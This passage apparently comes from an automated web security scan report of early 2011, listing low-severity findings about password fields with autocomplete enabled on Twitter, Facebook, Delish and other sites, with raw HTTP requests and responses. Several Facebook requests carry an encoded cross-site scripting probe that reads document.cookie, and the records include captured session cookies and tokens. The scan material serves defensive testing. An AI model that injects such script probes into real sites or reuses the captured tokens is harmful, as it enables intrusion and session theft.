Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.11. https://secure.scout.com/a.z

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

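The page contains a form with the following action URL:
  https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2fwww.scout.com%2fa.z%3fs%3d143%26p%3d3%26blipid%3d14568
The form contains the following password fields with autocomplete enabled:
  Password
  Password2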

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//www.scout.com/a.z%3Fs%3D143%26p%3D3%26blipid%3D14568 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://www.scout.com/a.z?s=143&p=3&blipid=14568
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.5.9.1296350713426

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:17 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2fwww.scout.com%2fa.z%3fs%3d143%26p%3d3%26blipid%3d14568"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.12. http://spacefellowship.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://spacefellowship.com
Path:   /

Issue detail

The page contains a form with the following action URL (as it appears in the response):
  /login?redirect=%2F
The form contains the following password field with autocomplete enabled:
  password

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache
Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly
Connection: close
Content-Type: text/html; charset: utf-8
Content-Length: 92137

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<div id="plWindow">
   <form id="frmlogin" name="frmlogin" method="post" action="/login?redirect=%2F">
       <div id="plClose">
...[SNIP]...
<input class="DefaultInput" id="plInputUsr" name="username" value="" type="text" />
               <input class="DefaultInput" id="plInputPass" name="password" value="" type="password" />
               <div id="plAutoLogin">
...[SNIP]...

18.13. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:51:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296352284-49541-12061
ETag: "cde121a33e5e26c8e020ac06ab7c0791"
Last-Modified: Sun, 30 Jan 2011 01:51:24 GMT
X-Runtime: 0.00851
Content-Type: text/html; charset=utf-8
Content-Length: 45480
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="52a7f7700c88db3705fc60176c90792a79d7ea4a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.14. http://twitter.com/HelenASPopkin

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /HelenASPopkin

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356567-38386-11000
ETag: "ea52c5afedc85cb07c6fff4a75310922"
Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT
X-Runtime: 0.01712
Content-Type: text/html; charset=utf-8
Content-Length: 52277
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="7112f152a33fd38233dac7eee2baccfb5f1a61b6" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.15. http://twitter.com/MichaelWann

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /MichaelWann

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356547-81727-2377
ETag: "8262f10ce7c81e5136cabe2a78847bad"
Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT
X-Runtime: 0.01194
Content-Type: text/html; charset=utf-8
Content-Length: 52843
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="04ce36dc88c688fbf8c8fcc09d50084b9d94d44e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.16. http://twitter.com/windabenedetti

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /windabenedetti

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356577-57560-43117
ETag: "37e7d4764aa4356aeb8c7f93b34df6b0"
Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 49069
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="605592f449c7d57bb409d0ab1eebc9f66c6859a4" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.17. http://twitter.com/wjrothman

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /wjrothman

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356563-11223-39959
ETag: "067321df962e685b47091af05f4b9fbc"
Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT
X-Runtime: 0.01619
Content-Type: text/html; charset=utf-8
Content-Length: 49641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2eb13435cec5e140e0a24b7110f92ab8d8d33ca9" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.18. https://twitter.com/ToddKenreck

Summary

Severity:   Low
Confidence:   Certain
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The page contains a form with the following action URL:
  https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  session[password]

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:03:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356581-64489-22662
ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb"
Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="9bdf7e1aeeee559b3eaf84adf915e8794d9fb1c6" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

18.19. http://www.dailygrail.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The page contains a form with the following action URL (as it appears in the response):
  /content/Daily-Grail-Frontpage?destination=node%2F7931
The form contains the following password field with autocomplete enabled:
  pass

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<div class="content">
<form action="/content/Daily-Grail-Frontpage?destination=node%2F7931" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

18.20. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.delish.com
Path:   /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The page contains a form with the following action URL:
  https://login.delish.com/registration/login
The form contains the following password field with autocomplete enabled:
  password

Request

GET /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 109796
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=337
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>-->
                       
                       <form name="login" action="https://login.delish.com/registration/login" method="post" onSubmit="return verifyForm(this);">
                       <input type="hidden" name="remember_me" value="1" />
...[SNIP]...
</span><input id="password" name="password" type="password" maxlength="155" /></div>
...[SNIP]...

18.21. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.delish.com
Path:   /food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The page contains a form with the following action URL:
  https://login.delish.com/registration/login
The form contains the following password field with autocomplete enabled:
  password

Request

GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 93291
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=504
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>-->
                       
                       <form name="login" action="https://login.delish.com/registration/login" method="post" onSubmit="return verifyForm(this);">
                       <input type="hidden" name="remember_me" value="1" />
...[SNIP]...
</span><input id="password" name="password" type="password" maxlength="155" /></div>
...[SNIP]...

18.22. http://www.facebook.com/2008/fbml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:
  https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  pass

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.23. http://www.facebook.com/HelenASPopkin

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HelenASPopkin

Issue detail

The page contains a form with the following action URL:
  https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  pass

Request

GET /HelenASPopkin HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:48 GMT
Content-Length: 14974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.24. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page contains a form with the following action URL:
  https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

